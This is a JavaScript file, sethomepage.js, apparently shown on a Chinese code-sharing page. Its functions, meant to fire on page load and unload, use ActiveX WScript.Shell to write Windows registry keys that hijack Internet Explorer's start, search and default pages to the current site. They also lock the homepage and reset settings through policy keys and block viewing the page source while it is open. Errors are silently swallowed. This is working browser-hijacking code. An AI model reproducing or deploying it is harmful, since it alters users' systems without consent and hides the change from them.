📄 sethomepage.js
字号:
function homepagebodyonload()
{
try
{
var wsh = new ActiveXObject("WScript.Shell");
wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", window.location);
wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Page", window.location);
wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\default_page_url", window.location);
wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\First Home Page",window.location);
wsh.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\system\\DisableRegistryTools","0","REG_DWORD");
wsh.RegWrite("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\HomePage","0","REG_DWORD");
wsh.RegWrite("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\ResetWebSettings","0","REG_DWORD");
wsh.RegWrite("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoViewSource","1","REG_DWORD");
}
catch(Err){}
}
function bodyonload()
{
try
{
var wsh = new ActiveXObject("WScript.Shell");
wsh.RegWrite("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoViewSource","1","REG_DWORD");
}
catch(Err){}
}
function bodyonunload()
{
try
{
var wsh = new ActiveXObject("WScript.Shell");
wsh.RegWrite("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoViewSource","0","REG_DWORD");
}
catch(Err){}
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -